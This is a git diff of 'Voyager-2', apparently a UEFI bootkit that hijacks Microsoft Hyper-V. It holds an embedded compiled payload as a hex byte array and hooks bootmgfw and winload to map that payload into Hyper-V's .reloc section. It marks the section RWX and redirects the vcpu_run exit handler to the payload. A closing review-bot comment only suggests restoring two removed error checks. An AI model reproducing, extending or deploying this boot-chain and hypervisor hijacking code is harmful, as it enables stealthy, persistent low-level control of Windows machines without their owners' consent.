0x05, 0x76, 0x1F, 0x00, 0x00, 0x48, 0x89, - 0x44, 0x24, 0x40, 0x48, 0x8B, 0x54, 0x24, 0x68, 0x48, 0x8B, 0x4C, 0x24, - 0x60, 0xFF, 0x54, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x58, 0xC3, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x56, 0x48, 0x83, + 0xEC, 0x20, 0x48, 0x8B, 0xD9, 0x48, 0x8D, 0x35, 0x0C, 0x01, 0x00, 0x00, + 0xB9, 0x11, 0x00, 0x00, 0x00, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0xF3, 0x6E, + 0x0F, 0x01, 0xDD, 0x48, 0x8D, 0x05, 0xD6, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, + 0xCB, 0x48, 0x2B, 0x05, 0xCC, 0x1F, 0x00, 0x00, 0xFF, 0xD0, 0x4C, 0x8B, + 0xC0, 0x0F, 0x01, 0xDC, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x35, + 0xF8, 0x00, 0x00, 0x00, 0xB9, 0x10, 0x00, 0x00, 0x00, 0xF3, 0x6E, 0x65, + 0x48, 0x8B, 0x14, 0x25, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8A, 0xB0, + 0x03, 0x01, 0x00, 0x48, 0x8B, 0x91, 0x98, 0x01, 0x00, 0x00, 0x48, 0x8B, + 0x8A, 0x80, 0x0E, 0x00, 
0x00, 0xE9, 0x8D, 0x00, 0x00, 0x00, 0x48, 0xB8, + 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0x39, 0x43, 0x08, + 0x0F, 0x85, 0x84, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x81, 0xC8, 0x00, 0x00, + 0x00, 0x48, 0x8D, 0x35, 0x8C, 0x00, 0x00, 0x00, 0x48, 0x89, 0x81, 0x78, + 0x05, 0x00, 0x00, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0x48, 0xC7, 0x81, 0xF8, + 0x05, 0x00, 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0xB9, 0x11, 0x00, 0x00, 0x00, + 0xF3, 0x6E, 0x0F, 0x01, 0xDD, 0x48, 0x8D, 0x05, 0x44, 0xFF, 0xFF, 0xFF, + 0x48, 0x8B, 0xCB, 0x48, 0x2B, 0x05, 0x3A, 0x1F, 0x00, 0x00, 0xFF, 0xD0, + 0x4C, 0x8B, 0xC0, 0x0F, 0x01, 0xDC, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0x48, + 0x8D, 0x35, 0x66, 0x00, 0x00, 0x00, 0xB9, 0x10, 0x00, 0x00, 0x00, 0xF3, + 0x6E, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, + 0x88, 0xB0, 0x03, 0x01, 0x00, 0x48, 0x8B, 0x81, 0x98, 0x01, 0x00, 0x00, + 0x48, 0x8B, 0x88, 0x80, 0x0E, 0x00, 0x00, 0x48, 0x83, 0x79, 0x70, 0x72, + 0x0F, 0x84, 0x68, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x49, + 0x8B, 0xC0, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, + 0xCC, 0xCC, 0xCC, 0xCC, 0x62, 0x65, 0x66, 0x6F, 0x72, 0x65, 0x20, 0x76, + 0x63, 0x70, 0x75, 0x5F, 0x72, 0x75, 0x6E, 0x0A, 0x00, 0xCC, 0xCC, 0xCC, + 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, + 0x61, 0x66, 0x74, 0x65, 0x72, 0x20, 0x76, 0x63, 0x70, 0x75, 0x5F, 0x72, + 0x75, 0x6E, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
@@ -141,47 +156,32 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x13, 0xB9, 0x72, 0x5F, 0x00, 0x00, 0x00, 0x00, - 0x02, 0x00, 0x00, 0x00, 0x56, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xB9, 0x72, 0x5F, - 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, - 0x90, 0x20, 0x00, 0x00, 0x90, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, - 0xD4, 0x11, 0x42, 0x7D, 0x4D, 0x15, 0x9E, 0x40, 0xAD, 0x44, 0xBC, 0xDA, - 0x99, 0x36, 0xE3, 0xCF, 0x01, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, + 0x00, 0x00, 0x00, 0x00, 0x91, 0x48, 0x75, 0x5F, 0x00, 0x00, 0x00, 0x00, + 0x02, 0x00, 0x00, 0x00, 
0x59, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, + 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x91, 0x48, 0x75, 0x5F, + 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, + 0x94, 0x20, 0x00, 0x00, 0x94, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, + 0xCE, 0x74, 0x7C, 0x88, 0x8C, 0xD6, 0x6B, 0x49, 0x87, 0x35, 0x71, 0x34, + 0xAF, 0x3B, 0x11, 0xC5, 0x01, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, 0x73, 0x65, 0x72, 0x73, 0x5C, 0x78, 0x65, 0x72, 0x6F, 0x78, 0x5C, 0x44, 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x76, 0x6F, 0x79, 0x61, 0x67, - 0x65, 0x72, 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, 0x65, 0x61, - 0x73, 0x65, 0x5C, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x28, 0x49, - 0x6E, 0x74, 0x65, 0x6C, 0x29, 0x2E, 0x70, 0x64, 0x62, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0xA2, 0x00, 0x00, 0x00, - 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x20, 0x00, 0x00, 0x38, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, 0xD8, 0x00, 0x00, 0x00, - 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7A, 0x7A, 0x7A, 0x64, 0x62, - 0x67, 0x00, 0x00, 0x00, 0x10, 0x21, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, - 0x2E, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x28, 0x00, 0x00, 0x00, 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x40, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x2E, 0x70, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, - 0x2E, 0x65, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x02, 0x0E, 0x03, 0x00, - 0x01, 0x16, 0x00, 0x06, 0x0E, 0xA2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x65, 0x72, 0x5C, 0x56, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x2D, 0x32, + 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, 0x65, 0x61, 0x73, 0x65, + 0x5C, 0x50, 0x61, 0x79, 0x4C, 
0x6F, 0x61, 0x64, 0x2E, 0x70, 0x64, 0x62, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, + 0x20, 0x01, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, + 0x00, 0x00, 0x00, 0x00, 0x20, 0x11, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, + 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x73, 0x00, 0x00, 0x20, 0x00, 0x00, + 0x38, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, + 0x38, 0x20, 0x00, 0x00, 0xEC, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, + 0x74, 0x61, 0x24, 0x7A, 0x7A, 0x7A, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, + 0x24, 0x21, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x2E, 0x78, 0x64, 0x61, + 0x74, 0x61, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, + 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, + 0x0C, 0x00, 0x00, 0x00, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, + 0x00, 0x50, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x2E, 0x65, 0x64, 0x61, + 0x74, 0x61, 0x00, 0x00, 0x02, 0x0A, 0x06, 0x00, 0x02, 0x16, 0x00, 0x06, + 0x0A, 0x34, 0x06, 0x00, 0x0A, 0x32, 0x06, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, @@ -199,7 +199,7 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0xA2, 0x10, 0x00, 0x00, 0x10, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x18, 0x11, 0x00, 0x00, 0x24, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
@@ -245,12 +245,12 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x32, 0x50, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x50, 0x00, 0x00, 0x2C, 0x50, 0x00, 0x00, 0x30, 0x50, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x45, 0x50, 0x00, 0x00, 0x00, 0x00, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, - 0x64, 0x28, 0x49, 0x6E, 0x74, 0x65, 0x6C, 0x29, 0x2E, 0x64, 0x6C, 0x6C, - 0x00, 0x3F, 0x76, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x63, 0x6F, - 0x6E, 0x74, 0x65, 0x78, 0x74, 0x40, 0x40, 0x33, 0x55, 0x5F, 0x56, 0x4F, - 0x59, 0x41, 0x47, 0x45, 0x52, 0x5F, 0x44, 0x41, 0x54, 0x41, 0x5F, 0x54, - 0x40, 0x40, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x3E, 0x50, 0x00, 0x00, 0x00, 0x00, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, + 0x64, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x3F, 0x76, 0x6F, 0x79, 0x61, 0x67, + 0x65, 0x72, 0x5F, 0x63, 0x6F, 0x6E, 0x74, 0x65, 0x78, 0x74, 0x40, 0x73, + 0x76, 0x6D, 0x40, 0x40, 0x33, 0x55, 0x5F, 0x76, 0x6F, 0x79, 0x61, 0x67, + 0x65, 0x72, 0x5F, 0x74, 0x40, 0x31, 0x40, 0x41, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, diff --git a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h index 1430a93..172565f 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h +++ b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h @@ -3,14 +3,14 @@ extern unsigned char PayLoad[3072]; #pragma pack(push, 1) -typedef struct _voyager_t +typedef struct _VOYAGER_T { - UINT64 VmExitHandlerRva; + UINT64 VCpuRunHandlerRVA; UINT64 HypervModuleBase; UINT64 HypervModuleSize; UINT64 ModuleBase; UINT64 ModuleSize; -} voyager_t, * pvoyager_t; +} VOYAGER_T, *PVOYAGER_T; #pragma pack(pop) UINT32 PayLoadSize(VOID); 
diff --git a/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c b/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c index 24dc87c..aec8ad7 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c +++ b/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c @@ -22,11 +22,14 @@ EFI_STATUS EFIAPI UefiMain DBG_PRINT("unable to restore bootmgfw... reason -> %r\n", Result); return Result; } + DBG_PRINT("restored bootmgfw on disk...\n"); if (EFI_ERROR((Result = InstallBootMgfwHooks(ImageHandle)))) { DBG_PRINT("Failed to install bootmgfw hooks... reason -> %r\n", Result); return Result; } + + DBG_PRINT("installed bootmgfw hooks...\n"); return EFI_SUCCESS; } \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj index bd8f39f..c99bbf3 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj +++ b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj @@ -24,7 +24,7 @@ {540d433f-c2df-49a6-895c-f5c74b014777} HyperMe 10.0 - Voyager-1 (2004-1709) + Voyager-2 (2004-1709) @@ -175,7 +175,7 @@ - + @@ -184,7 +184,7 @@ - + diff --git a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters index 555200b..bb0d0ac 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters +++ b/Voyager-2/Voyager-2 (2004-1709)/Voyager-2 (2004-1709).vcxproj.filters @@ -26,10 +26,10 @@ Source Files - + Source Files - + Source Files @@ -40,9 +40,6 @@ Header Files - - Header Files - Header Files @@ -52,5 +49,8 @@ Header Files + + Header Files + \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c index d36e964..e6bc338 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c +++ b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.c 
@@ -48,7 +48,7 @@ EFI_STATUS EFIAPI BlLdrLoadImage(VOID* Arg1, CHAR16* ModulePath, CHAR16* ModuleN
 {
 if (!AsciiStrCmp(&pSection->Name, ".reloc"))
 {
- voyager_t VoyagerData;
+ VOYAGER_T VoyagerData;
 MakeVoyagerData
 (
 &VoyagerData,
@@ -59,24 +59,19 @@ EFI_STATUS EFIAPI BlLdrLoadImage(VOID* Arg1, CHAR16* ModulePath, CHAR16* ModuleN
 );
 
 DBG_PRINT(".reloc section base address -> 0x%p\n", TableEntry->ModuleBase + pSection->VirtualAddress);
- DBG_PRINT(".reloc section end (aka golden record base address) -> 0x%p\n", TableEntry->ModuleBase + pSection->VirtualAddress + pSection->Misc.VirtualSize);
+ DBG_PRINT(".reloc section end (aka payload base address) -> 0x%p\n", TableEntry->ModuleBase + pSection->VirtualAddress + pSection->Misc.VirtualSize);
 
- VOID* VmExitHook = MapModule(&VoyagerData, PayLoad);
- if (!VmExitHook)
- return Result;
-
- VOID* VmExitFunction = HookVmExit
+ VOID* VCpuRunHook = MapModule(&VoyagerData, PayLoad);
+ VOID* VmExitFunction = HookVCpuRun
 (
 VoyagerData.HypervModuleBase,
 VoyagerData.HypervModuleSize,
- VmExitHook
+ VCpuRunHook
 );
- if (!VmExitFunction)
- return Result;
 
 pSection->Characteristics = SECTION_RWX;
 pSection->Misc.VirtualSize += PayLoadSize();
- DBG_PRINT("VmExitHook (PayLoad Entry Point) -> 0x%p\n", VmExitHook);
+ DBG_PRINT("vcpu_run hook (payload entry point) -> 0x%p\n", VCpuRunHook);
 }
 }
 
diff --git a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h
index bf75013..56e5588 100644
--- a/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h
+++ b/Voyager-2/Voyager-2 (2004-1709)/WinLoad.h
@@ -1,6 +1,6 @@
 #pragma once
 #include "Utils.h"
-#include "Hvix64.h"
+#include "Hvax64.h"
 #include "PayLoad.h"
 
 extern SHITHOOK WinLoadImageShitHook;
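Review bot: The second hunk drops both failure checks around MapModule and HookVCpuRun, so if MapModule returns NULL the code still calls `HookVCpuRun(..., VCpuRunHook)` with a NULL hook, which patches hv's call displacement to point at address 0, and then goes on to mark the section RWX and grow `VirtualSize` as if everything succeeded; restore `if (!VCpuRunHook) return Result;` after the MapModule call and `if (!VmExitFunction) return Result;` after HookVCpuRun (meaningful once HookVCpuRun itself returns NULL on a failed scan again), with whatever `Result` holds at that point, as the old code did. `VmExitFunction` is otherwise an unused local now, and its name no longer matches what HookVCpuRun returns — `VCpuRunFunction` would read better. BlLdrLoadImage begins and ends outside this hunk.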